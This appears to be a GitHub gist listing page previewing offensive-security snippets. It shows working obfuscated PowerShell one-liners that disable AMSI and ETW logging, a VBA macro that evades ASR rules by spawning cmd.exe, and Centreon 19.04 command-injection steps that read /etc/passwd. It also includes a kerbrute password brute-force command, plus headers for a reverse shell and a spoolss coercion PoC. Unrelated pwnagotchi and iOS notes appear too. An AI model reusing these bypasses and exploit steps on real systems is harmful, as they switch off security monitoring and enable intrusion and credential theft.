sinfulz
@D3Ext
D3Ext / amsi-bypass.md
Last active March 30, 2024 02:23
All methods to bypass AMSI (2022)

AMSI Bypass

To perform all these techniques you can simply try them by typing "Invoke-Mimikatz" into your PowerShell terminal; you'll notice that even if you haven't imported Mimikatz it will detect that as malicious. But if AMSI is off or you avoid it, it will just say that "it's not recognized as the name of a cmdlet", so you could say that you've bypassed AMSI.

However, some methods may be detected by the AV, but most of them actually work without problems.

Powershell downgrade

The first and worst way to bypass AMSI is downgrading the PowerShell version to 2.0.

@qtc-de
qtc-de / DynWin32-ReverseShell.ps1
Last active March 16, 2024 10:37
PowerShell reverse shell that uses dynamically resolved Win32 API functions
<#
DynWin32-ReverseShell.ps1 is a reverse shell based on dynamically looked up Win32 API calls.
The script uses reflection to obtain access to GetModuleHandle, GetProcAddress and CreateProcess.
Afterwards it uses GetModuleHandle and GetProcAddress to resolve the required WSA functions
from ws2_32.dll.
This script should be used for educational purposes only (and maybe while playing CTF :D).
It was only tested on Windows 10 (x64) and is probably not stable or portable. Its only
purpose is to demonstrate the usage of reflective lookups of Win32 API calls. See it as
@reigningshells
reigningshells / powershell-bypasses.ps1
Last active March 16, 2024 09:06
Random PowerShell Bypasses
# Logging bypass:
(({}).gettype())."aSs`emblY"."Getty`PE"(('System.Manage'+'ment.Automati'+'on.Trac'+'ing.P'+'SEtwL'+'og'+'Pro'+'vi'+'d'+'e'+'r'))."gEtf`ieLD"(('etwProvi'+'de'+'r'),('Non'+'P'+'ublic,Static'))."Se`TVAL`Ue"($null,(New-Object System.Diagnostics.Eventing.EventProvider(New-Guid)))
# AMSI Bypass (old, burned)
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
# New AMSI bypass obfuscation:
@sinfulz
sinfulz / CVE-2019-17501.txt
Last active September 13, 2020 14:22
CVE-2019-17501 - Centreon 19.04 Authenticated RCE
Centreon 19.04 allows attackers to execute arbitrary OS commands via the Command Line field
of main.php?p=60807&type=4 (aka the Configuration > Commands > Discovery screen).
------------------------------------------
[Additional Information]
Once one has logged into Centreon:
1. navigate to: Configuration > Commands > Discovery OR http://ip-address/centreon/main.php?p=60807&type=4
2. in the "Command Line" section put a command: e.g. "cat /etc/passwd" without quotes.
@GermaniumSystem
GermaniumSystem / pwnagotchi notes
Last active March 7, 2024 14:37
How to set up a pwnagotchi in 25* simple steps.
Preface:
I have no idea if any of this is the "right" way of doing it. This is just how I got my unit working.
Good luck.
WARNING: Do not use a V1 Waveshare display module with a stock pwnagotchi! The pwnagotchi expects a V2 module, and may irreparably damage a V1 module!
A V1 display module *can* work, but you must modify `waveshare.py` and `display.py` beforehand. For the time being, this is left as an exercise for the reader.
If you have already burnt a V1 display, try disconnecting it from the Pi and leaving it overnight. This may rejuvenate the display somewhat, but it will likely still display signs of damage.
Installation:
1. `dd` Raspbian Lite to an SD card.
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform Kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@infosecn1nja
infosecn1nja / ASR Rules Bypass.vba
Last active April 25, 2024 21:00
ASR rules bypass creating child processes
' ASR rules bypass creating child processes
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule
Sub ASR_blocked()
Dim WSHShell As Object
Set WSHShell = CreateObject("Wscript.Shell")
WSHShell.Run "cmd.exe"
End Sub
@3xocyte
3xocyte / dementor.py
Last active February 11, 2024 14:10
rough PoC to connect to spoolss to elicit machine account authentication
#!/usr/bin/env python
# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample
# some code from https://www.exploit-db.com/exploits/2879/
import os
import sys
import argparse
import binascii
import ConfigParser
@CokePokes
CokePokes / gist:9ad9eb5578c94418f437b39475f75e2f
Last active January 12, 2020 07:12
WatchUtils for iOS 11 Electra
This tweak is useless without following the steps below.
Description: Use your Apple Watch to respring/reboot/safemode your connected device.
You can download the ipa file here: https://mega.nz/#!8qgRjJCA!CZjS2FiZ1wKpq5oBZt-MXOxK_kcGOYAvwur_QFh8o7g
Then re-sign with cert only (no prov profile) with iOS App Signer found here: http://dantheman827.github.io/ios-app-signer/
Then install with Xcode > Window > Devices & Simulators > Connected Device > +
Then install the "Core WatchUtils" dependency from my beta repo here: https://cokepokes.github.io/ & respring.